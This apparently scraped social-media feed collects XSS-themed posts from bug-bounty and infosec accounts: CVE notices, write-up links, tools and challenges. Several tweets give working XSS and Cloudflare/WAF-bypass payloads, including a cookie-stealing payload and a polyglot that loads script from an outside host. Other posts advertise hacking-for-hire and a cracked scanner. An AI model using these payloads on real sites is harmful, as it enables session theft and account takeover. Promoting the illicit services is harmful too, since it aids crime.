![profile](https://pbs.twimg.com/profile_images/1637174174652440576/Y5Q0b52n_normal.jpg)
SecurCrew
@SecurCrewa year agoCVE-2022-47444 (profilepress) Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, ... https://t.co/YPdpMd9P6Z #SecurCrew #infosec #BugBounty #CyberSecurity #OSINT
![profile](https://pbs.twimg.com/profile_images/1626268981274505218/1kaj8Ypc_normal.jpg)
Cyber Wiki
@theCyberWikia year agoIntroduction to Hacking, Hacker and Hacker Classes https://t.co/ABMu5pf9bE #CyberWiki #HackHunt #Hack #Hacker #Hacking #EthicalHacking #Network #EthicalHacker #Cybersecure #Cybersecurity #Vulnerable #Software #Pentesting #XSS #VAPT #Audit #Forensics #Coding #BugHunting https://t.co/xWZhXI4UbC
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoWAF Bypass XSS Payload in JSON:📷 ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1641763380531978241/h5a1qE9r_normal.jpg)
Vishal Vishwakarma
@rootxvishala year agoWAF Bypass XSS Payload in JSON:⚙️ ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1641763380531978241/h5a1qE9r_normal.jpg)
Vishal Vishwakarma
@rootxvishala year agoCloudflare XSS Bypass ⚠️ <svg/onload=location/**/='https://t.co/9J76uAEMi3…> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudfIare XSS 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱:⚙️ <select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoWAF Bypass XSS Payload in JSON:⚙️ ["');alert('CYBERTIX');//"] #XSS #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoStored XSS Payload⚡️ <abdool attr=" --- x="=='='onmouseover=confirm`abdool` style="display:block;width:1000px;height:1000px;background:red"> --- "> #infosec #bugbountytips #cybersecuritytips
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year ago0x0SojalSec discovered a #vulnerability that could allow attackers to bypass XSS protections from Cloudflare. 🔍 Read more about this security flaw here: https://t.co/7RcQ8izV7X. 🛡️ Stay safe & secure with #Infosec & #bugbountytips. 🔐 #Cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoXSS payload to steal cookies ⚡️🍪 "><script>document.write(%27<img%20src="https://t.co/Y4b5kr8aSN"%20/>%27);</script> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudflare XSS Bypass ⚠️ <svg/onload=location/**/='https://t.co/JjpSb9H5fd> #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoXSS polyglot ⚡️ '"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT> #infosec
![profile](https://pbs.twimg.com/profile_images/1219143153871020032/3tvm-Zt7_normal.jpg)
Sathish M
@goldenrockers1a year ago@NinadMishra5 @terjanq @SaveToBookmarks #XSS #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1622271479542075392/ddDAE9uH_normal.jpg)
mann
@maxx_191a year agoXSScrapy- Automated XSS Finder - Tool to automate XSS discovery with extra features to find XSS, SQL https://t.co/gHAUdM0meF #bugbountytips #infosec #xss #bugbounty
![profile](https://pbs.twimg.com/profile_images/938049153585860608/zQUSrn9H_normal.jpg)
ACCEIS
@acceisa year agoSolution for the vulnerable code snippet n°2 🛠️ See the write-up article: https://t.co/YK9lkIgAGG Vuln : XSS 🪲 Language : Ruby 💎 Fixed code below: #codereview #vulnerablecode #codesnippet #brokencode #appsec #infosec #pentesting #securityexplained https://t.co/3FwmVtUnx8
![profile](https://pbs.twimg.com/profile_images/938049153585860608/zQUSrn9H_normal.jpg)
ACCEIS
@acceisa year agoSolution for the vulnerable code snippet n°2 🛠️ See the detailed article: https://t.co/fRVVRtWV2Z Vuln : XSS 🪲 Language : Ruby 💎 Fixed code below: #codereview #vulnerablecode #codesnippet #brokencode #appsec #infosec #pentesting #securityexplained https://t.co/TZ81lKNs9L
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-1067): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/ykKOFWRVCD Disclosed by https://t.co/JGbdQ993Su, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1536825710530203649/8DJczDdG_normal.png)
Security Pills
@secpillsnewsa year ago🌩 Microsoft Azure Account Takeover @creastery explains how a mistake in a regex could be exploited by attackers to steal a user's Azure session and gain access to other cloud resources. #appsec #bugbounty https://t.co/uFRpk2dSij https://t.co/zY6fLifWk7
![profile](https://pbs.twimg.com/profile_images/1630948684958408704/oq3k4FU6_normal.jpg)
elsec
@adrielseca year agotip: swagger never disappoints! 👀 XSS at Shopify https://t.co/uNmUlT70PW #bugbountytips #bugbounty #infosec #seginfo #hacking #hackerone
![profile](https://pbs.twimg.com/profile_images/1627558481975803904/7LeBxf9M_normal.jpg)
Ahmed Kamal Abu_Elwafa
@AhmedKa01184061a year agoI just published a new Write-up on medium : How I Was able to find 2 Stored XSS via SVG file Upload https://t.co/7SnZuBx4Wx #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoInteresting Stored XSS in sandboxed environment to Full Account Takeover https://t.co/u6w4j4jgZQ #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1386359003031261192/0hg0RNma_normal.png)
OpsMatters
@opsmatters_uka year agoThe latest update for #Indusface includes "What is Cross-Site Scripting (XSS)? Types of XSS, Examples, and Patching Best Practices" and "How to Prevent SQL Injection Attacks?". #cybersecurity #infosec https://t.co/DmQDQErqjL
![profile](https://pbs.twimg.com/profile_images/1583097371050708992/Q1Ofhd9j_normal.jpg)
Rui Shang
@RuiShang9a year ago#bugbountytips #BugBounty Server-Side MIME Sniff resulting from Go language project containerization https://t.co/DfF0mr6kCp
![profile](https://pbs.twimg.com/profile_images/669268065507373056/7fTno46I_normal.png)
Jesse Clark
@Hogarth45_a year ago@mongobug Gotta keep the impact above 22 if you want an invite to an event. Why report an xss for $250 and miss out on an event to get $20k+ https://t.co/1smezAKjk1
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@fattselimi @TopengaNFT @TomNomNom @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1406662913637732354/59r07pmT_normal.jpg)
Nish Vamadevan
@nisha year agoI am seeing a lot of Cross-site Scripting (XSS) and Cross-Site Request Forgery (CSRF) vulnerabilities popping up lately. #cybersecurity #infosec #Vulnerabilities #Threat #Attack #XSS #CSRF
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoWhat is the benefit of the X-XSS-Protection: 0 header in a production environment? - Visit https://t.co/42Eaw9sIBR for the answer. #xss #infosec #coder #developer #software
![profile](https://pbs.twimg.com/profile_images/1629129999411191815/TlOdkiol_normal.jpg)
drak3hft7
@drak3hft7a year agoHi @yeswehack everything okay? if the vuln is of medium severity, the program exposes that it pays up to 500 euros for the averages. Why is a Reflected XSS only paid 250? not a very nice thing for us bug hunters. #BugBounty #YesWeRHackers
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoGoogle Dork list for XSS https://t.co/cfsRfahf6C #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://abs.twimg.com/sticky/default_profile_images/default_profile_normal.png)
WAF bypass
@waf_bypassa year ago7h3h4ckv157 👩💻 Check out this awesome blog post by 7h3h4ckv157 to learn how to bypass Cloudflare and exploit XSS vulnerabilities. 🤩 Get the step-by-step instructions here: https://t.co/mWhfpuIdJT #infosec #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1630136629523517441/a-9XwJvL_normal.jpg)
7h3h4ckv157
@7h3h4ckv157a year agoCloudflare bypass and exploit your xss https://t.co/rnvF60AivR #infosec #bugbountytips #BugBounty
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/mMMDrt5dEK
![profile](https://pbs.twimg.com/profile_images/1626618299491688448/8Uda91tW_normal.jpg)
Rajneesh Gupta | Cybersecurity Coach
@_RajneeshGuptaa year ago🔺 Top 5 Web Application Vulnerabilities 1. Cross-site Scripting(XSS) 2. Broken Authentication 3. SQL Injection 4. Cross-Site Request Forgery(CSRF) 5. Insecure Direct Object Reference #hacking #cybersecurityt
![profile](https://pbs.twimg.com/profile_images/931552541074128896/DEimVzqz_normal.jpg)
The Daily Swig
@DailySwiga year agoThis month’s #BugBountyRadar: Fresh targets from Grindr and Miro, infosec drama with XSS Hunter’s new host, and Belgium rolls out the red carpet for ethical hackers https://t.co/9zOiONeuGu
![profile](https://pbs.twimg.com/profile_images/1406662913637732354/59r07pmT_normal.jpg)
Nish Vamadevan
@nisha year agoPatch your Aruba Devices. A vulnerability in the ArubaOS web management interface could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. https://t.co/bwf0D8qkFp #cybersecurity #infosec #aruba
![profile](https://pbs.twimg.com/profile_images/1408753006477185030/_7Q1eRbL_normal.jpg)
ether_dz
@BELKHIRIKhired1a year agoso what do you think it's an ssrf or xss ? #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1528690038527119362/e5qXzKMq_normal.jpg)
Drocapy
@azam_gassima year agoagain xss 🔥 tip: try to understand how the site works by analyzing its features and internal functions via view-source. Note: If we are talking about speed and performance in work @Bugcrowd Triaged & customer team is the best 🚀 #bugbountytips #BugBounty https://t.co/IzFt44872q
![profile](https://pbs.twimg.com/profile_images/1630647787837587462/N5C6BHCA_normal.jpg)
Who Am I ?
@19Who_Am_I19a year agoReflected XSS in 2 mins , u have to check the hidden parameters its a hidden gems " WHO AM I ? " #bugbounty #bugbountytips #bughunting #hackerone #bugcrowd https://t.co/G2W2LudwWu
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoUbuntu 58991: AWStats vulnerability - AWStats could allow crosssite scripting (XSS) attacks. Ubuntu Security Notice USN58991 February 28, 2023 awstats vulnerabili... @lnxsec #Ubuntu #Linux #infosec #opensource #linuxsecurity https://t.co/ClnvcyBT5Z https://t.co/WBzHcdzudG
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoInteresting Stored XSS in sandboxed environment to Full Account Takeover by: varmaanu001 https://t.co/7X3zjexTgn #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/ChABNlvuGF
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/hprxRy4jiq
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBlind XSS fired on Admin panel worth $2000 https://t.co/YLXcpXrryQ #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1266895467700531203/Qa3BBoML_normal.png)
ㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤㅤㅤㅤㅤ sudo rm -rf /*
@ApostolWarioa year agohttps://t.co/mH9fFH0fJq - RT @InfoSecComm: 48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/rmk18FBTko #earmas
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoHello, Another Interesting XSS challenge, DOM Clobbering to XSS. In collaboration with @hamzaavvan https://t.co/cbUXZfOKke #xss #BugBounty #challenge
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCRsO… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/sYWU098Kco
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoGoogle Dork list for XSS by: anoint https://t.co/vSTj8hJa07 #bugbounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1453300783546576912/8Omwr9fa_normal.jpg)
Cyber Fusion Team
@SecAlliancea year agoOn 25 February 2023, a user on underground hacking forum XSS created a post advertising the sale of email access into the French Ministry of the Armed Forces and Brazilian Public Defenders Office (DPU).
![profile](https://pbs.twimg.com/profile_images/1266895467700531203/Qa3BBoML_normal.png)
ㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤ ㅤㅤ ㅤㅤㅤ ㅤㅤㅤㅤㅤ sudo rm -rf /*
@ApostolWarioa year agohttps://t.co/mH9fFH0fJq - 48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/rmk18FBTko #earmas
![profile](https://pbs.twimg.com/profile_images/1000400570761396224/zSfCs2uU_normal.jpg)
InfoSec Community
@InfoSecComma year ago48th edition of IWWeekly is live 🔥 In this week's newsletter learn about: 1. Slack Vulnerability 2. DOM-XSS on Microsoft 3. GraphQL Hacking 4. Hacking AWS Cloud 5. XSS Guide Read here: https://t.co/B4RqgobE2a
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO
@hacklidoa year ago💠 Blue Team Bootcamp Series (P3): How to Detect Cross-Site Scripting (XSS) Attacks By @LE0_Hak #cybersecurity #infosec #xss #bugbounty #bugbountytips #pentesting #web https://t.co/wJGSQrvnQ4
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰📡
@HackwithGarry9a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/oFkI41GbFW
![profile](https://pbs.twimg.com/profile_images/1575494481775759360/b9y0iB3S_normal.jpg)
Hackerinthehouse
@hackerinhousea year agoBuilding an XSS Scanner with Python https://t.co/pyl341gapt #bugbounty #bugbountytips #cybersecurity #xss
![profile](https://pbs.twimg.com/profile_images/1369764815003136007/DX3xE5wp_normal.jpg)
khalil shreateh 🧢
@Shreateha year agohttps://t.co/rQjN3k80aL #shreateh #exploit #hacker #computer #cybersecurity #blackleaders #technology #vulnerability #vulnerabilityisstrength #vulnerable #infosec #security #tech #hacking #programming #hackers #coding #safety #cybersec
![profile](https://pbs.twimg.com/profile_images/1629446960997605377/vlE6XwJF_normal.jpg)
KRIPT099
@KRIPT099a year agoBuilding XSS Scanner Using Python 👇 https://t.co/chGTxtfaiZ #bugbounty #bugbountytips #cybersecurity #infosec #xss #xssscanner
![profile](https://pbs.twimg.com/profile_images/1627584048884490240/COXWsJSV_normal.jpg)
Saif abdullah khan🇧🇩
@0xmahia year agoxss via jwt= 1. Make a jwt token and insert a xss payload. 2. The final url is like url/dest?jwt=vulnerable-jwt-token. (jwt= parameter was decoding the provided jwt token and shows it in the page). @TopengaNFT Thanks my frnd 🔥 #BugBounty #bugbountytips https://t.co/AbkzeQ517i
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0995): Cross-site Scripting (XSS) - Stored in unilogies/bumsys. https://t.co/4cYB9DWrqU Disclosed by https://t.co/PLCH1wNNXA, fixed by unilogies maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@solminingpunk: Never forget the XSS attack on Flux(.)tech 😜 https://t.co/P9fXoH9SUU #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoHi folks, Back with another XSS challenge. Just a regular XSS, try to get a pop-up. https://xss-heaven(.)000webhostapp(.)com/xss.php Note: Remove the Brackets from URL Dm your solutions. #cyberseurity #xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ [XSS] Reflected XSS via POST request 👨💻 @0xd3adcode ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/g7WfEIBzmd #bugbounty #bugbountytips #cybersecurity https://t.co/fR0I64irIH
![profile](https://pbs.twimg.com/profile_images/1504688064027041794/DY3bxBcU_normal.jpg)
Dev
@computerauditora year agoI found a crlf injection on a website now it's showing 302 redirect,I am trying to escalate it to xss or html injection so do share any tips,all suggestions are welcome!! #BugBounty #infosec #informationsecurity #Hackingtime https://t.co/FcAjzQWACk
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoHow I was able to Turn a XSS into A Account Takeover #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1609771921503313921/oaFOkuY-_normal.jpg)
VP Tiwari
@cyberzeasta year agoFound a fancy new way to conceal XSS payloads! Check it out in our cheat sheet: #BugBounty #Tips #xss @Hacker0x01 @Bugcrowd @TomNomNom https://t.co/I7Y5mkcCDp
![profile](https://pbs.twimg.com/profile_images/1619947865500966912/DPho3gfp_normal.jpg)
0xD3ADC0DE
@0xd3adcodea year agoMultiple Reflected XSS founds on https://t.co/Cgarwyf33y @StateDept subdomain... Going for a new report on @Hacker0x01 #BugBounty #HackTheUS #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1114515035865399296/V6nLLbjK_normal.jpg)
Sam Stepanyan
@securestep9a year agoGoogle pays $3,133.70 #BugBounty for #XSS #vulnerability in #golang's net/html library. Great find and a great 6-minute bug explanation video by Greg (@gregxsunday) here: #bugbountytips #AppSec #CodeReview https://t.co/8BCkxlfW2S
![profile](https://pbs.twimg.com/profile_images/1438448666646253568/Ojcd-JB1_normal.png)
Dhaval Patel
@d4rk_hors3a year agovideo https://t.co/7kdnyHKheK #bugbountytips #BugBounty #bugbountytip #xss #infosec #appsec #ethicalhacking #cybersecuritytips #CyberSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoMy first finding XSS,IDOR https://t.co/0Ht2TPg5nq #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1039728317170114560/YXg2yTQB_normal.jpg)
Bad Advertiser
@0xbadada year agoXSS (Cross-Site Scripting)- Explained In Layman's Term #Cybersecurity #infosec #security via https://t.co/4hyuGbMt4K https://t.co/W59F5Wlf9V
![profile](https://pbs.twimg.com/profile_images/1242982896211652609/JHYwg95l_normal.jpg)
spyx
@spyx_mykya year agoParamAngler - the ultimate tool for testing specific payloads on each parameter! 💻🔍🐟 With one payload, you can spray all parameters and search for vulnerabilities including XSS, LFI, SSTI, SQLi, and more! 🎣🐛 https://t.co/BCldVlnt6n #bugbounty #bugbountytool #WebAppTesting https://t.co/6Db1UszYGz
![profile](https://pbs.twimg.com/profile_images/1607002355244875776/mkEg80g5_normal.jpg)
Banking and Fintech News
@StanleyEpsteina year agoXSS (Cross-Site Scripting)- Explained In Layman's Term #Cybersecurity #infosec #security via https://t.co/eBW8Lmmpx7 https://t.co/2SI5ShMJMK
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO
@hacklidoa year ago💠 XSS (Cross-Site Scripting)- Explained In Layman's Term by AnuragTaparia https://t.co/7VWyC1xxPN #CyberSecurity #infosec #github #Pentesting #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/fQaVv2c2VX… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/oklct0ERV1
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/CFbeA5b4NT… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1622985328796766208/TXiIa4-v_normal.jpg)
@Siddhartha S
@sidharthas8962a year ago@beginnbounty Thanks for share such as a very informative and interesting tool for finding xss. #hacking #bug bounty
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@arth_bajpai @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdatea year ago#cloudflare #infosec #xss https://t.co/N3EgHmUgL5
![profile](https://pbs.twimg.com/profile_images/475477136/Photo_1_normal.jpg)
Kevin Figueroa
@KevinFigueroaa year agoNicely conceal XSS payloads... #CyberSecurity #infosec #pentesters https://t.co/EV9Uvp03mS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDoes allowing the <cite> tag create any XSS vulnerabilities? - Visit https://t.co/MpAyiRsOe3 for the answer. #web_application #xss #infosec #programmers #software
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoBlind XSS fired on Admin panel worth $2000 by: feribytex https://t.co/J1nLcb7p82 #BugBounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0949): Cross-site Scripting (XSS) - Reflected in modoboa/modoboa. https://t.co/ByslusUXQp Disclosed by https://t.co/LTnJiZHuwG, fixed by modoboa maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/fwIfa7QU9U #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agohttps://t.co/fQaVv2c2VX Hack Services available 24/7 Link: https://t.co/fQaVv2c2VX… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1570738195473768449/J4Bj2n88_normal.jpg)
Muhammad Julfikar Hyder
@thejulfikara year agohttps://t.co/kLHpcpEHUe #bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoWhy does this XSS vector work in svg but not in HTML? - Visit https://t.co/zDtWU030cH for the answer. #xss #svg #infosec #dev #devlife
![profile](https://pbs.twimg.com/profile_images/1510636081812807686/gzG5JLku_normal.jpg)
Jh0n_
@Jh0n_0xa year agoXSS Payload Bypass: <b><img/src='x'//oNerror=alert(document.cookie)//;<img/>Jh0n_0x<b/> by: @Jh0n_0x #BugBounty #xss #payloadxss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoI have created a simple Prototype Pollution XSS challenge. Try to get a pop-up. DM me your solution. https://t.co/l8BxnBDWKK #BugBounty #XSS
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: stored-xss-on-app-crowdsignal-com--your-subdomain-crowdsignal-net-via-thank-you-headerby0xwega74 - https://t.co/a1xYPDWcJ3 #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1625150892994592768/mMlTDMHc_normal.jpg)
GsmScholar
@GSMPMCYBERa year agoDay #10/210 XSS attack A little more persistence, a little more effort, and what seemed hopeless failure may turn to glorious success. XSS attack, an attacker typically injects malicious code (usually JavaScript) into a web page, #BugBounty #goals #infosec https://t.co/GaG6hvck8J
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@_0x999 @bug_vs_me @netwons1 @dvrahmr @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoMicrosoft Azure Account Takeover via DOM-based XSS in Cosmos DB Explorer (PoC included) https://t.co/kMmGtpWfb0 #xss #bughunting #hacking #Azure
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Invicti Professional Edition 23.2.0.39705 Full Activated – Discount 100% https://t.co/Joixus9aMb Link: https://t.co/pYvl8kDod7 #HackerOne #infosec #Synack #bugcrowd #bugbountytips #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #BugHunter https://t.co/L8mv7i56IU
![profile](https://pbs.twimg.com/profile_images/1255015535416193024/ggrb9Zoh_normal.jpg)
Hack Reports
@HackReportsa year agoStay up-to-date on the latest #cybersecurity news! The latest AppSec vulnerabilities, new hacking techniques, and more. Protect your network and stay informed! #appsec #infosec #security https://t.co/DsPRagTfwe
![profile](https://pbs.twimg.com/profile_images/1620629168491724800/Is7hsoXv_normal.jpg)
Akita 🇦🇷 who Am I ?
@akita_zena year agohttps://t.co/s461rsxZV2 by @_lauritz_ #bugbounty #infosec
![profile](https://pbs.twimg.com/profile_images/1599893886046011394/s8l4vTSh_normal.jpg)
Unknwz_
